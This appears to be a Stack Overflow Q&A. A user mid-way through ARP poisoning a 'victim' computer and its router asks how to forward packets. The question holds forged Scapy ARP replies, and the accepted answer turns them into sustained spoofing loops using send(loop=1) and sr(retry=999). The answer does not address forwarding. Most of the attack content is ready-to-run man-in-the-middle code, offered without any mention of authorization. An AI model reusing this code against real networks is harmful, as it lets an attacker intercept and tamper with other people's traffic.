# Python-2.7 Scapy retransmit packet to destination

Tags: python, scapy, arp

Doing an arp poisonning, I am in the middle of the connection of 1-the router and 2-the victim computer. How can I retransmit the packet to the destination? (preferably with scapy)
I have this :

```
send(ARP(op=ARP.is_at, psrc=router_ip, hwdst=victim_mac, pdst=victim_ip))
send(ARP(op=ARP.is_at, psrc=victim_ip, hwdst=router_mac, pdst=router_ip))
```

Answer (score 1, accepted):

Reviewing [*Scapy*'s API documentation](http://www.secdev.org/projects/scapy/files/scapydoc.pdf) suggests these alternatives:

1. The `send` function accepts 2 additional arguments that could prove useful:

   > `loop`: send the packets endlessly if not 0.
   >   `inter`: time in seconds to wait between 2 packets.

   Therefore, executing the following statement would send the packets in an endless loop:

   ```
   send([ARP(op=ARP.is_at, psrc=router_ip, hwdst=victim_mac, pdst=victim_ip),
         ARP(op=ARP.is_at, psrc=victim_ip, hwdst=router_mac, pdst=router_ip)],
        inter=1, loop=1)
   ```
2. The `sr` function accepts 3 arguments that could prove useful:

   > `retry`: if positive, how many times to resend unanswered packets. if negative, how many consecutive unanswered probes before giving up. Only the negative value is really useful.
   >   `timeout`: how much time to wait after the last packet has been sent. By
   >   default, `sr` will wait forever and the user will have to interrupt (*Ctrl-C*) it when he expects no more answers.
   >   `inter`: time in seconds to wait between each packet sent.

   Since no answers are expected to be received for the sent *ARP* packets, specifying these arguments with the desired values enables sending the packets in a finite loop, in contrast to the previous alternative, which forces an endless one.

   On the down side, this is probably a bit less efficient since resources are allocated towards packet receipt and handling, but this is negligible.

   Therefore, executing the following statement would send the packets in a finite loop of 1000 iterations:

   ```
   sr([ARP(op=ARP.is_at, psrc=router_ip, hwdst=victim_mac, pdst=victim_ip),
       ARP(op=ARP.is_at, psrc=victim_ip, hwdst=router_mac, pdst=router_ip)],
      retry=999, inter=1, timeout=1)
   ```

Comment: Clicked on the link and found that the examples are empty. Is it normal? (p 12-18) because if the information is in these pages, I am not able to see them!

Comment: I've experienced the same issue with these pages. I'm unsure why. However, examples may be found [here](http://www.secdev.org/projects/scapy/doc/usage.html) or via a simple google search.

Comment: Thank you for your help! Can you help me with this one? http://stackoverflow.com/questions/32804176/python-scapy-arp-request-and-response